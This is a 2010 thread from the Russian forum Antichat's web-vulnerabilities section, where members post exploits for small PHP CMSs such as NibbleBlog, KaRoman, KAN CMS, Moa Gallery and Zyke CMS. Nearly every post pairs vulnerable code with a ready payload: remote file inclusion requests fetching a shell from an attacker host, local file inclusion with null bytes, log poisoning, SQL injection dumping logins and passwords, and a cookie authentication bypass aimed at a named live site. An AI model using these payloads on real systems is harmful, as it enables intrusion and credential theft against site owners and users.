HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

NibbleBlog 2.0 Remote File Inclusion
  #1  
Старый 03.06.2010, 13:12
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
С нами: 9428066

Репутация: 1668
По умолчанию NibbleBlog 2.0 Remote File Inclusion

NibbleBlog 2.0
Site: http://www.nibbleblog.com

Remote File Inclusion

Vuln file: /admin/includes/index_login.php
PHP код:
    if($var_url['exe']=='login')
    {
            
$var_form['login_user'] = (string) $_POST['form_field_user'];
            
$var_form['login_password'] = (string) $_POST['form_field_password'];

            if( !empty(
$var_form['login_user']) && !empty($var_form['login_password']) )
            {
                include(
$_PATH['shadow.php']);
/*...*/ 
Подобная уязвимость в /admin/includes/profile.php
Need: register_globals = On
Exploit:
Код:
POST http://[host]/[path]/admin/includes/index_login.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

var_url[exe]=login&form_field_user=1&form_field_password=1&_PATH[shadow.php]=http://[evil_host]/shell.wtf
__________________
Avant que l'ombre...
 
Ответить с цитированием

  #2  
Старый 07.06.2010, 23:25
_iks_
Познающий
Регистрация: 21.02.2009
Сообщений: 54
С нами: 9061820

Репутация: 134
По умолчанию

E2 SELECTA
Site: http://blogengine.ru/

Local File Include(0-day ):

./spesta/counter.php
Уязвимый код:

PHP код:
 ...
 if (!isset (
$s_addurl))
 {
  
$z=dirname(__FILE__);
  
$z2=$_SERVER['DOCUMENT_ROOT'].dirname ($_SERVER['PHP_SELF']);
  
$s_addurl=substr ($zstrpos ($z$z2)+strlen($z2));
  if (
$s_addurl!=""$s_addurl.="/";
 }
 else [
COLOR=DarkRed]$s_addurl=str_replace (":",""$s_addurl);[/COLOR]

 include (
$s_addurl."func.php");
 ... 
Exploit:

Как видно из нашей переменной вырезается двоеточие, поэтому теоретически имеем только локальный инклуд, однако нам на руку то, что движок ведёт своеобразный журнал по адресу ./spesta/data/, в частности в файл requests.php записывается запрошенный URL, и ничто не мешает указать в нём например <?php phpinfo();?>, поэтому сначала обращаемся к какой-нибудь страницe добавив к URL-адресу наш php-код, а затем инклудим вот так:

Код:
./spesta/counter.php?s_addurl=data/request.txt%00
Также можно внести код в agents.txt(логируются юзерагенты).

Примечание:

для этой уязвимости не играет роли значение register_globals, так как в .htacess эта настройка взводится, однако на всякий случай я решил уведомить об этом.


Содержимое .htacess:

Код:
RewriteEngine Off
DirectoryIndex index.php
Options -Indexes -MultiViews
ErrorDocument 403 /stat/deny.php
<IfModule mod_php4.c>
php_flag display_errors off
php_flag register_globals on
php_flag magic_quotes_gpc off
php_flag magic_quotes_runtime off
php_flag magic_quotes_sybase off
php_flag zlib.output_compression on
php_value output_buffering 0
php_value session.use_trans_sid 0
</IfModule>
<IfModule mod_php5.c>
php_flag display_errors off
php_flag register_globals on
php_flag magic_quotes_gpc off
php_flag magic_quotes_runtime off
php_flag magic_quotes_sybase off
php_flag zlib.output_compression on
php_value output_buffering 0
php_value session.use_trans_sid 0
</IfModule>

Последний раз редактировалось _iks_; 13.06.2010 в 11:27..
 
Ответить с цитированием

  #3  
Старый 09.06.2010, 23:44
_iks_
Познающий
Регистрация: 21.02.2009
Сообщений: 54
С нами: 9061820

Репутация: 134
По умолчанию

KaRoman CMS
http://sourceforge.net/projects/karoman/


SQL-инъекция(mq == off):
./view_article.php?id=0'+union+select+1,concat(user, 0x3a,pass),3,4,5,6,7,8+FROM+userlist--+


PHP код:
...

if (isset(
$_GET['id'])) {$id $_GET['id'];}

$result mysql_query("SELECT * FROM articles WHERE id='$id'",$db); // Выбираем нужные таблицы

... 

SQL-иньекция(права администратора):
./admin/settings.php?id=100500+union+select+1,2,3,4,5,6


PHP код:
...

if (isset(
$_GET['id'])) {$id $_GET['id'];}

$result mysql_query("SELECT title,id FROM settings");      

... 
SQL-иньекция(права администратора):
./admin/edit_art.php?id=100500+union+select+1,2,3,4,5,6,7, 8

PHP код:
...

if (isset(
$_GET['id'])) {$id $_GET['id'];}

$result mysql_query("SELECT * FROM articles WHERE id=$id");

... 
 
Ответить с цитированием

  #4  
Старый 14.06.2010, 12:12
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами: 9347610

Репутация: 165
По умолчанию

Ov3rLo1d[-]Invisible
http://wowjp.net/forum/61-15808-1

/admin/index.php
PHP код:
...

if (!isset(
$HTTP_POST_VARS["submitloginform"]) && (($HTTP_COOKIE_VARS['userlogged'] == "yes") || ($_SESSION['sessionlogin'] == "yes"))) {

/* Sets $PHPSESSID to the PHPSESSID in the cookie */
$PHPSESSID $HTTP_COOKIE_VARS['userid'];

/* Set $mode to the thingy on the url */
$mode $HTTP_GET_VARS['mode'];

/* Removes the cookie before anything is displayed */
if ($mode == "logout") {
    
session_destroy();
    
setcookie("userlogged"""time()-600);
    
setcookie("userid"""time()-600);
}

... 
Добавляем себе в куки userlogged = yes
Код:
http://shadow-server.ru/admin/

Последний раз редактировалось SeNaP; 14.06.2010 в 22:42..
 
Ответить с цитированием

  #5  
Старый 16.06.2010, 23:31
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами: 9100556

Репутация: 912
По умолчанию

Puzzle Apps CMS 3.2
site:www.puzzleapps.org

File Disclosure

file: filepresenter.loader.php

PHP код:
if ($_GET["getfile"]) {
    
$filename $_GET["filename"];
    if (! 
$filename)
        
$filename "file";
    
header('Content-Disposition: attachment; filename="' $filename '"');
    
header("Content-type: application/octetstream");
    
header("Pragma: no-cache");
    
header("Expires: 0");
    
    
readfile($FILEROOT $_GET["getfile"], "r+");
    
    die();

result:
Код:
filepresenter.loader.php?getfile=../../[local_file]&filename=wtf.txt
 
Ответить с цитированием

  #6  
Старый 17.06.2010, 17:39
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами: 9100556

Репутация: 912
По умолчанию

KAN CMS 1.0 beta
site: www.kancms.org

SQL-Injection

need: mq=off

file: pages/sections.php
PHP код:
    include('site_selector.php'); 

    
// next we'll include the section manager component to enable the template
    // easily pick information from database
    
include('sections_manager.php');

    
// next we need to load the specific theme / template index file
    // the $themeFolder variable is created in the site selector
    
include( $themeFolder 'pages/sections.php');

/***************************************************************************/

//file: pages/site_selector.php

if( !isset($_GET['siteid']) ) {
//header("Location: ../pages/");
    
$query "SELECT * FROM sites WHERE sitetype = 'main'";
    
$rsSite mysql_query($query$config);
    
$row_rsSite mysql_fetch_assoc($rsSite);

    
$site_identifier $row_rsSite['SiteIdentifier'];
    
mysql_free_result($rsSite);

    
$_GET['siteid'] = $site_identifier;

} else {
    
$site_identifier $_GET['siteid'];
}

// find the site ID for the specified identifier    
$query "SELECT * FROM sites WHERE SiteIdentifier = '$site_identifier'";
$rsSite mysql_query($query$config);
$row_rsSite mysql_fetch_assoc($rsSite); 
result:
Код:
/pages/sections.php?siteid=-kan'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+&mid=3&sid=6
Также уязвим пареметр mid

Код:
/pages/sections.php?siteid=kan&mid=-1+union+select+1,2,3,4,5,6,7,8,9+--+&sid=6
example:
Код:
http://www.kancms.org/pages/sections.php?siteid=kan&mid=-3+/*!union*/+select+1,2,3,4,5,6,7,8,9+--+&sid=6
//мб нашел бы больше,но двиг,сцуко,не установился
//Двойной запрос, можно шелл залить Ctacok
// а так не залить что-ли, если требования mq=off? Jokester

Последний раз редактировалось Jokester; 17.06.2010 в 18:39..
 
Ответить с цитированием

  #7  
Старый 18.06.2010, 17:14
nikp
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
С нами: 9285506

Репутация: 1463
По умолчанию

Moa Gallery v1.2.2 (Updated 2010-06-17)

http://sourceforge.net/projects/moagallery/

В скриптах выставлена защита

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"CFG"[/COLOR][COLOR="#007700"]]))

{

echo[/COLOR][COLOR="#DD0000"]"Hacking attempt."[/COLOR][COLOR="#007700"];

die();

}

[/
COLOR][/COLOR
но в mod_main_funcs.php защита отсутствует

sources/mod_main_funcs.php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]// mod_gallery_funcs.php - This is a collection of functions that interect with the database and a gallery.

[/COLOR][COLOR="#007700"]include_once([/COLOR][COLOR="#0000BB"]$CFG[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"MOA_PATH"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"sources/_error_funcs.php"[/COLOR][COLOR="#007700"]);

include_once([/COLOR][COLOR="#0000BB"]$CFG[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"MOA_PATH"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"sources/_db_funcs.php"[/COLOR][COLOR="#007700"]);

include_once([/COLOR][COLOR="#0000BB"]$CFG[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"MOA_PATH"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"sources/mod_image_funcs.php"[/COLOR][COLOR="#007700"]);

...[/
COLOR][/COLOR
RFI or LFI

rg=on

http://localhost/Moa-1.2.2/sources/mod_main_funcs.php?CFG[MOA_PATH]=http://site.com/shell.txt%00

В версиях ниже 1.2.1 скрипт отсутствует.
 
Ответить с цитированием

  #8  
Старый 18.06.2010, 17:29
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами: 9100556

Репутация: 912
По умолчанию

Zyke CMS 1.1

site:www.zykecms.com

Authorization bypass

need: mq=off

file: index.php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'loginbt'[/COLOR][COLOR="#007700"]]))

{

if ([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'login'[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]and[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password'[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"])

{

if ([/COLOR][COLOR="#0000BB"]check_login[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'login'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password'[/COLOR][COLOR="#007700"]]) ==[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"])

{

if ([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'function'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])

[/
COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Location: admin/'[/COLOR][COLOR="#007700"]);

else

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Location: '[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]$error_login[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

}

else

{

[/
COLOR][COLOR="#0000BB"]$error_login[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"wrong username/password
"
[/COLOR][COLOR="#007700"];

}

}

}

...................



function[/COLOR][COLOR="#0000BB"]check_login[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"])

{

[/
COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM users WHERE login='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"' AND password='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]$num[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_num_rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]);



if
([/COLOR][COLOR="#0000BB"]$num[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])

{

[/
COLOR][COLOR="#0000BB"]session_start[/COLOR][COLOR="#007700"]();

[/
COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'last_access'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'function'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'function'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'login'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'login'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'firstname'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'firstname'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lastname'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lastname'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'date'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'date'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]];

return[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];

}

else

return
[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];

}

[/
COLOR][/COLOR
result:

Код HTML:

SQL-Injection

need: mq=off

file: index.php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#0000BB"]get_sidebar[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]])

...................

function[/
COLOR][COLOR="#0000BB"]get_sidebar[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"])

{

[/
COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM content WHERE urlname = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

if([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"])

{

[/
COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM content WHERE id = '1'"[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

}

[/
COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);

return[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sidebar'[/COLOR][COLOR="#007700"]];

}

[/
COLOR][/COLOR
result:

Код:
/index.php?p=content&id=-home'+union+select+1,2,concat_ws(0x3a,id,login,password),4,5,6,7+from+users--+
LFI

need: mq=off

file: index.php :d

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p'[/COLOR][COLOR="#007700"]]))

if ([/COLOR][COLOR="#0000BB"]is_file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]".php"[/COLOR][COLOR="#007700"]))

include ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]".php"[/COLOR][COLOR="#007700"]);

[/
COLOR][/COLOR
result:

Код:
/index.php?p=../../[local_file]%00&id=home
//зачетная cms...
 
Ответить с цитированием

  #9  
Старый 18.06.2010, 23:45
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами: 9100556

Репутация: 912
По умолчанию

PhpBpCms

Download: http://sourceforge.net/projects/phpbpcms/

Vuln: Local Files Include

Need: magic_quotes_gpc = Off

file: index.php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]//update of redirecting variables $_SESSION[redirect_1], [redirect_2]redirect_update();*/



[/COLOR][COLOR="#007700"]if(![/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'module'[/COLOR][COLOR="#007700"]])



include
([/COLOR][COLOR="#DD0000"]'modules/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$conf[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'default_module'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"]);

else



include
([/COLOR][COLOR="#DD0000"]'modules/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'module'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"]);

[/
COLOR][/COLOR
result:

Код:
/index.php?module=[local_file]%00
 
Ответить с цитированием

  #10  
Старый 24.06.2010, 16:12
_iks_
Познающий
Регистрация: 21.02.2009
Сообщений: 54
С нами: 9061820

Репутация: 134
По умолчанию

Grayscale BandSite CMS Ver. 1.1.4

Site: http://sourceforge.net/projects/bandsitecms/

SQL-иньекция(-):

Уязвимый файл:

./includes/content/interview_content.php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$intid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'intid'[/COLOR][COLOR="#007700"]];



[/COLOR][COLOR="#FF8000"]// define the query

// if the $memid variable is set, that means we're displaying a full bio and we should select the specific member entry

[/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$intid[/COLOR][COLOR="#007700"])){

[/
COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"

SELECT

*

FROM

interviews

WHERE

rec_id=[/COLOR][COLOR="
#0000BB"]$intid[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];

}[/COLOR][/COLOR
Эксплуатация:

./interviews.php?intid=-2+union+select+1,2,^,^,5,6,^,8,9,10​

SQL-иньекция(-):

Уязвимый файл:

./includes/content/lyrics_content.php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$sid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sid'[/COLOR][COLOR="#007700"]];



[/COLOR][COLOR="#FF8000"]// if the $sid variable is set, it means we're only after one song, so retrieve just that one

[/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$sid[/COLOR][COLOR="#007700"])){

[/
COLOR][COLOR="#FF8000"]// define the query to get this song

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"

SELECT

*

FROM

lyrics

WHERE

rec_id=[/COLOR][COLOR="
#0000BB"]$sid[/COLOR][COLOR="#DD0000"]
LIMIT

1
"[/COLOR][COLOR="#007700"];



[/COLOR][COLOR="#FF8000"]// get the result

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR


Эксплуатация:


/lyrics.php?sid=1+union+select+1,2,^,4,5,6,^,8,9​
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.